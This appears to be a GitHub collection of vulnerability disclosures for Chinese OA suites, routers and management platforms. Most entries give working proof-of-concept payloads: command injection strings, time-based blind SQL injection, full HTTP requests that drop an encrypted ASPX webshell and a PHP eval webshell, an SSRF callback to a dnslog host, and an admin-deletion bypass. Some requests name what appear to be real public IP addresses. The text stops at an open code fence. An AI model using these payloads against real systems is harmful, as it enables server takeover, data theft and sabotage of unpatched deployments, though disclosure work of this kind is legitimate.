├── DaHua..md ├── sql_inject.md ├── tengda.md ├── RG-BCR860.md ├── RG-EW1200G.md ├── sql_inject_3.md ├── sql_inject_2.md ├── S85F.md ├── rce.md ├── Weaver.md ├── sql_inject_4.md ├── sql_inject_5.md ├── wanjiang.md ├── ForU-CMS.md ├── tongda.md └── SimField.md /DaHua..md: -------------------------------------------------------------------------------- 1 | SSRF vulnerability of the front desk of comprehensive management platform of Zhejiang Dahua Smart Park 2 | 3 | official website:https://www.dahuatech.com/ 4 | 5 | CNVD Number:CNVD-2023-36128 6 | 7 | ```PAYLOAD: /ipms/imageConvert/image?fileUrl=http://khxjyl.dnslog.cn/1.jpg``` 8 | 9 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/2e990791-c41f-4f73-8438-18d46e144d22) 10 | 11 | DNSLOG The command output is displayed 12 | 13 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/515e3850-c9af-40fb-8b34-a4a3e978ccb2) 14 | -------------------------------------------------------------------------------- /sql_inject.md: -------------------------------------------------------------------------------- 1 | SQL injection vulnerability exists in ibos oa v4.5.5 2 | 3 | Version:4.5.5 4 | 5 | official website:http://www.ibos.com.cn/ 6 | 7 | 1. Log in to the background, email => Draft box => Delete draft capture 8 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/d9213f56-967d-4a38-b847-628527b70412) 9 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/6a73f20d-da27-40c9-bfea-1d7183a5878b) 10 | 11 | 2.Success delay 12 | ![WPS图片(3)](https://github.com/RCEraser/cve/assets/131632691/adf23c94-8a58-4abf-8138-5587a6d19b51) 13 | 14 | -------------------------------------------------------------------------------- /tengda.md: -------------------------------------------------------------------------------- 1 | Tengda router AC15 exists command execution 2 | 3 | Firmware download address:https://www.tenda.com.cn/download/detail-2680.html 4 | 5 | version:AC15 6 | 7 | After analyzing routes, the deviceName parameter is controllable, so that the command is executed 8 | 9 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/656018d0-1eff-41e8-be29-52265b675f29) 10 | 11 | Payload 12 | http://x.x.x.x/goform/setUsbUnload?deviceName=`echo '111'`>/tmp/bb.txt` 13 | 14 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/9041de24-aea8-4cc0-a9f3-86aedd9032f5) 15 | -------------------------------------------------------------------------------- /RG-BCR860.md: -------------------------------------------------------------------------------- 1 | The RG-BCR860 router has command execution vulnerabilities 2 | 3 | official website:https://www.ruijie.com.cn/ 4 | 5 | version:RG-BCR860 6 | 7 | 1. Log in to the background 8 | 9 | ![(1)](https://github.com/RCEraser/cve/assets/131632691/56c7a3c5-a227-45ef-844d-e937a875dd01) 10 | 11 | ![(2)](https://github.com/RCEraser/cve/assets/131632691/ac7bf7f4-da22-4c80-8c82-ebf9118cb45a) 12 | 13 | 2. Enter 127.0.0.1 in the Network Diagnostic-tracert check box. "cat /etc/passwd" to run the command 14 | ![(3)](https://github.com/RCEraser/cve/assets/131632691/b161804a-cd15-46fc-8858-c68c94c567ef) 15 | -------------------------------------------------------------------------------- /RG-EW1200G.md: -------------------------------------------------------------------------------- 1 | The RG-EW1200G router has a command execution vulnerability 2 | 3 | official website:https://www.ruijie.com.cn/ 4 | 5 | version:RG-EW1200G 6 | 7 | 1. Open the website right check app. Select network find 09 df2a9e44ab48766f5f. Js, then find/main search path, to the address bar, you can change the administrative 8 | password, and log out for us to change the password can log in. 9 | 10 | ![图片1](https://github.com/RCEraser/cve/assets/131632691/59833f9b-ab5d-4019-854e-a0a250b00940) 11 | 12 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/13e913c8-82f4-4ebe-9d1e-a1dd4782d4a6) 13 | 14 | ![WPS图片(3)](https://github.com/RCEraser/cve/assets/131632691/950c7887-b40e-47e2-a9f5-f4b8c37e2e22) 15 | 16 | 2. Log in to the system, locate More Tools, locate Network Tools, and find command execution vulnerabilities in the ping detection function 17 | 18 | ![WPS图片(4)](https://github.com/RCEraser/cve/assets/131632691/f77d1ba2-057e-46f1-8a9e-e5d952cf4203) 19 | 20 | 21 | 3.||echo `ipconfig` 22 | 23 | ![WPS图片(5)](https://github.com/RCEraser/cve/assets/131632691/1f383d23-6446-4103-bb81-0ae6ed06dfde) 24 | -------------------------------------------------------------------------------- /sql_inject_3.md: -------------------------------------------------------------------------------- 1 | SQL injection vulnerability exists in tongda oa v2017 2 | 3 | version:2017 4 | 5 | Route: general/hr/manage/staff_relatives/delete.php 6 | 7 | There is an injected parameter: $RELATIVES_ID 8 | 9 | The code here is neat, concatenating parameters directly into the SQL statement when $RELATIVES_ID is not empty. There is a bypass because of the parenthesis closure. 10 | 11 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/71670d34-ca27-4d73-a803-97bb2243669c) 12 | 13 | We can use Cartesian product blind injection, the following payload can determine that the first character of the database name is t, because it was successfully delayed at 116. ascii 116 also corresponds to the lowercase letter t. In this way, the database name and any database information can be obtained through blind injection. 14 | 15 | POC 16 | ``` 17 | 1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 18 | ``` 19 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/af257358-ab7b-4cd9-b114-333f9dbcc493) 20 | -------------------------------------------------------------------------------- /sql_inject_2.md: -------------------------------------------------------------------------------- 1 | SQL injection vulnerability exists in ibos oa 2 | 3 | official website:http://www.ibos.com.cn/ 4 | 5 | version:4.5.5 6 | 7 | Function point: Background management = "Address book management =" Post management = "Delete post function office 8 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/7e2c164b-fc2a-492b-8fcf-b3415c0e3265) 9 | 10 | POC 11 | 12 | Route: r=dashboard/position/del 13 | 14 | The injection parameter id exists 15 | 16 | If the input is normal, the following information is displayed 17 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/9dd187c3-9b68-43a0-ab17-b6accc8cc669) 18 | Stack delay successful 19 | ![WPS图片(3)](https://github.com/RCEraser/cve/assets/131632691/c9522a07-78af-4238-ad9f-3eb8d27e5f21) 20 | The module layer deleteAll() method is invoked through the actionDel() method to execute the SQL statement. 21 | ![WPS图片(4)](https://github.com/RCEraser/cve/assets/131632691/6947a225-81c0-4f9d-a665-e07a9bec97d7) 22 | ![WPS图片(5)](https://github.com/RCEraser/cve/assets/131632691/b7b2e03d-3d8f-476d-9c31-93b06ae60eff) 23 | ![WPS图片(6)](https://github.com/RCEraser/cve/assets/131632691/7f921357-a407-4427-af22-bddc3446e57b) 24 | -------------------------------------------------------------------------------- /S85F.md: -------------------------------------------------------------------------------- 1 | The Smart S85F management platform has an rce vulnerability 2 | 3 | official website:https://www.byzoro.com/ 4 | 5 | version:Smart S85F 6 | 7 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/76e88d7a-223d-4ec2-a7b1-a88480830c86) 8 | 9 | Construct the file parameter /etc/' sleep${IFS}10 '.pcap, and then use base64 encryption to construct the file parameter, and successfully execute the system command 10 | 11 | POC 12 | ``` 13 | GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1 14 | Host: 103.121.164.62:8443 15 | Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc 16 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0 17 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 18 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 19 | Accept-Encoding: gzip, deflate 20 | Upgrade-Insecure-Requests: 1 21 | Sec-Fetch-Dest: document 22 | Sec-Fetch-Mode: navigate 23 | Sec-Fetch-Site: none 24 | Sec-Fetch-User: ?1 25 | Te: trailers 26 | Connection: close 27 | ``` 28 | 29 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/1b0c9a57-f6b4-4e58-b3f2-c74f54bdfdfc) 30 | 31 | ![WPS图片(3)](https://github.com/RCEraser/cve/assets/131632691/6ff4f302-dd5b-4112-845f-d8b7ae8d839f) 32 | -------------------------------------------------------------------------------- /rce.md: -------------------------------------------------------------------------------- 1 | The Smart S85F management platform has an rce vulnerability 2 | 3 | official website:https://www.byzoro.com/ 4 | 5 | version :Smart S85F 6 | 7 | As shown in the login interface 8 | 9 | Construct the url, download successfully, construct the poc, and execute the command successfully 10 | 11 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/a1165784-f866-448a-963b-9f62be8444b1) 12 | 13 | https://60.29.117.204:8443/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc3lzMS5waHAn 14 | 15 | POC 16 | ``` 17 | POST /app/sys1.php HTTP/1.1 18 | Host: 60.22.74.195:8443 19 | Cookie: 20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 22 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 23 | Accept-Encoding: gzip, deflate 24 | Upgrade-Insecure-Requests: 1 25 | Sec-Fetch-Dest: document 26 | Sec-Fetch-Mode: navigate 27 | Sec-Fetch-Site: none 28 | Sec-Fetch-User: ?1 29 | Te: trailers 30 | Connection: close 31 | Content-Type: application/x-www-form-urlencoded 32 | Content-Length: 6 33 | 34 | cmd=id 35 | ``` 36 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/4084458a-d982-46ab-9cd5-516ccde25696) 37 | -------------------------------------------------------------------------------- /Weaver.md: -------------------------------------------------------------------------------- 1 | Weaver E-Office v9.5 has arbitrary file upload vulnerability 2 | 3 | official website:https://www.e-office.cn/ 4 | 5 | POC 6 | ``` 7 | POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 8 | Host: xx:8088 9 | Content-Length: 338 10 | Cache-Control: max-age=0 11 | Upgrade-Insecure-Requests: 1 12 | Origin: null 13 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt 14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 16 | Accept-Encoding: gzip, deflate 17 | Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 18 | Connection: close 19 | 20 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt 21 | Content-Disposition: form-data; name="upload_quwan"; filename="1.php@" 22 | Content-Type: image/jpeg 23 | 24 | 25 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt 26 | Content-Disposition: form-data; name="file"; filename="" 27 | Content-Type: application/octet-stream 28 | 29 | 30 | ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt-- 31 | ``` 32 | verification 33 | 34 | ![WPS图片(1)](https://user-images.githubusercontent.com/131632691/234152011-123b5f73-6efc-47f1-b753-3e06a4ae6c11.png) 35 | 36 | ![WPS图片(2)](https://user-images.githubusercontent.com/131632691/234152039-b6b3a7b2-7c09-4e1f-ba30-5285e2b1783a.png) 37 | 38 | -------------------------------------------------------------------------------- /sql_inject_4.md: -------------------------------------------------------------------------------- 1 | SQL injection vulnerability exists in Tongda OA v2017 and later versions 11.10 2 | 3 | verison:v2017 and v11.10 or later 4 | 5 | 1. 6 | 7 | Routing: general/hr/salary/welfare_manage/delete PHP 8 | 9 | There is an injected parameter: $WELFARE_ID 10 | 11 | The code here is neat, concatenating the parameter directly into the SQL statement when the $WELFARE_ID is not empty, which is bypassed because the parentheses are closed. 12 | 13 | ![图片1](https://github.com/RCEraser/cve/assets/131632691/dde9b679-4bb9-4061-917a-4250db54c4c5) 14 | 15 | 2.Payload 16 | 17 | We can use Cartesian product blind injection, the following payload can determine that the first character of the database name is t, because it was successfully delayed at 116. ascii 116 also corresponds to the lowercase letter t. In this way, the database name and any database information can be obtained through blind injection. 18 | 19 | POC 20 | ``` 21 | 1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 22 | ``` 23 | ![图片2](https://github.com/RCEraser/cve/assets/131632691/c762a965-9a50-4ff3-acd3-dc9ce983ab90) 24 | 25 | And we're going to change 116 to 115 so there's no delay, so there's SQL injection. 26 | 27 | ``` 28 | 1)%20and%20(substr(DATABASE(),1,1))=char(115)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 29 | ``` 30 | ![图片3](https://github.com/RCEraser/cve/assets/131632691/babef685-deca-428f-8adc-ad8630cc8aab) 31 | -------------------------------------------------------------------------------- /sql_inject_5.md: -------------------------------------------------------------------------------- 1 | Unauthorized SQL injection vulnerability exists in Tongda OA 2 | 3 | version:v2017 and versions below v11.10 4 | 5 | Routing: general/system/approve_center/flow_guide/flow_type/set_print/delete.php 6 | 7 | There is an injected parameter: $DELETE_STR 8 | 9 | The code here is very concise. When $DELETE_STR is not empty, the parameters are directly spliced ​​into the SQL statement. Since the parentheses are closed here, there is a bypass. 10 | ![图片1](https://github.com/RCEraser/cve/assets/131632691/5ecfdddf-10f1-4830-bff2-5a829c449fcd) 11 | 12 | We can use Cartesian product blind injection for injection. The following payload can determine that the first character of the database name is t, because it was successfully delayed at 116. The ASCII code 116 also corresponds to the lowercase letter t. By analogy, the database name and any information about the database can be obtained through blind injection. 13 | POC 14 | ``` 15 | 1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)% 20and(1)=(1 16 | ``` 17 | ![图片2](https://github.com/RCEraser/cve/assets/131632691/a1a25a4b-fd0b-483b-bbd7-1a34b5e14c68) 18 | 19 | And when we change 116 to 115, there will be no delay, indicating the existence of SQL injection. 20 | 21 | POC 22 | ``` 23 | 1)%20and%20(substr(DATABASE(),1,1))=char(115)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 24 | ``` 25 | ![图片3](https://github.com/RCEraser/cve/assets/131632691/bdd74f71-91a0-426b-b4b9-fae20f173d24) 26 | -------------------------------------------------------------------------------- /wanjiang.md: -------------------------------------------------------------------------------- 1 | Flash flood disaster monitoring and warning system 2.0 has arbitrary file upload vulnerability 2 | 3 | official website:http://www.cdwanjiang.com/ 4 | 5 | version:2.0 6 | 7 | Chengdu Wanjiang Gangli Technology Co., LTD. - Mountain flood disaster monitoring and early warning system 2.0 has a serious arbitrary file upload vulnerability, which can obtain server permissions without authorization. 8 | 9 | 10 | POC 11 | ``` 12 | POST /App_Resource/UEditor/server/upload.aspx HTTP/1.1 13 | Host: xx.xx.xx.xx 14 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJa5U4zOAfmJDcYxj 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 17 | Accept-Encoding: gzip, deflate 18 | Accept-Language: zh-CN,zh;q=0.9 19 | Connection: close 20 | Content-Length: 541 21 | 22 | ------WebKitFormBoundaryJa5U4zOAfmJDcYxj 23 | Content-Disposition: form-data; name="file"; filename="1.aspx" 24 | Content-Type: image/jpeg 25 | 26 | <%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b");byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> 27 | ------WebKitFormBoundaryJa5U4zOAfmJDcYxj-- 28 | ``` 29 | 30 | 31 | ![WPS图片(1)](https://github.com/RCEraser/cve/assets/131632691/6690e5d0-cf55-46f9-9f51-ee5b527aad68) 32 | ![WPS图片(2)](https://github.com/RCEraser/cve/assets/131632691/b36b9817-fed1-4808-8400-00f2ed7d2aaa) 33 | -------------------------------------------------------------------------------- /ForU-CMS.md: -------------------------------------------------------------------------------- 1 | ForU-CMS logic flaw led to the deletion of underlying administrators 2 | 3 | downlaod:https://gitee.com/sw1981/ForU-CMS 4 | 5 | version:dev Official version 6 | 7 | 1. When deleting the underlying administrator, it prompts that it cannot be deleted. 8 | 9 | ![image](https://github.com/RCEraser/cve/assets/131632691/6730775c-fcf0-42bf-9045-115a675255e0) 10 | 11 | 12 | 2. Use burp to capture packets and change the del parameter value to 1.X to directly delete the underlying administrator account and bypass back-end restrictions. 13 | ``` 14 | POC 15 | GET /admin/cms_admin.php?del=1.2 HTTP/1.1 16 | Host: www.forucms.com 17 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 18 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 19 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 20 | Accept-Encoding: gzip, deflate 21 | Connection: close 22 | Referer: http://www.forucms.com/admin/cms_admin.php 23 | Cookie: cms[mail_size]=40; token_user=61646d696e2b31; PHPSESSID=7to756v150s0h9ib4a93t4tcr4; cms[url_back]=http%3A%2F%2Fwww.forucms.com%2Findex.php 24 | Upgrade-Insecure-Requests: 1 25 | X-Forwarded-For: 1.1.1.1 26 | X-Originating-IP: 1.1.1.1 27 | X-Remote-IP: 1.1.1.1 28 | X-Remote-Addr: 1.1.1.1 29 | ``` 30 | 31 | ![image](https://github.com/RCEraser/cve/assets/131632691/7bffdfdb-dc44-4331-bf81-4bbc6339684f) 32 | 33 | ![image](https://github.com/RCEraser/cve/assets/131632691/91399f52-ca85-43e0-9807-b541ab130bdd) 34 | 35 | 3. After the underlying administrator is deleted, all functions become unavailable. 36 | ![image](https://github.com/RCEraser/cve/assets/131632691/9738f8d9-9899-4655-b89b-6010ed3ff12a) 37 | 38 | 4. Since we use the intval() function, we can construct 1.x at the del argument to bypass the backend restriction and remove the underlying administrator directly. 39 | ![image](https://github.com/RCEraser/cve/assets/131632691/9899ca04-e90a-493d-83cd-bfffe84d3a9b) 40 | 41 | -------------------------------------------------------------------------------- /tongda.md: -------------------------------------------------------------------------------- 1 | Tongda OA v11.10 has unauthorized arbitrary file upload vulnerability 2 | 3 | official website:https://www.tongda2000.com/ 4 | 5 | version:v11.10 6 | 7 | 1. The actionGetdata() method exists in the code general\appbuilder\modules\portal\controllers\GatewayController.php, where the activeTab parameter is controllable. In line 2018 the activeTab argument is in the GetData method. 8 | 9 | ![WPS图片(1)](https://user-images.githubusercontent.com/131632691/236481314-252c56c0-e488-4523-bb24-3d56b149fbbf.png) 10 | 11 | In the GetData() method, query the id argument by findall to see if the array exists, and if the queried id does, enter the if statement on line 21. So the $attribute argument in line 38 is controllable, causing the array to be closed and thus written to the file via fwrite(). 12 | 13 | ![WPS图片(2)](https://user-images.githubusercontent.com/131632691/236481926-d2a3976d-8c18-46eb-b3e0-59602a4861df.png) 14 | 15 | 2. The vulnerability reappears 16 | 17 | poc 18 | 19 | ``` 20 | http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage 21 | ``` 22 | 23 | ![WPS图片(3)](https://user-images.githubusercontent.com/131632691/236482594-8413af7a-b2be-414d-b505-6e2168315c80.png) 24 | 25 | Write php files with fwrite(fopen()) through array closure, and bypass global filtering with no parameter. 26 | 27 | ``` 28 |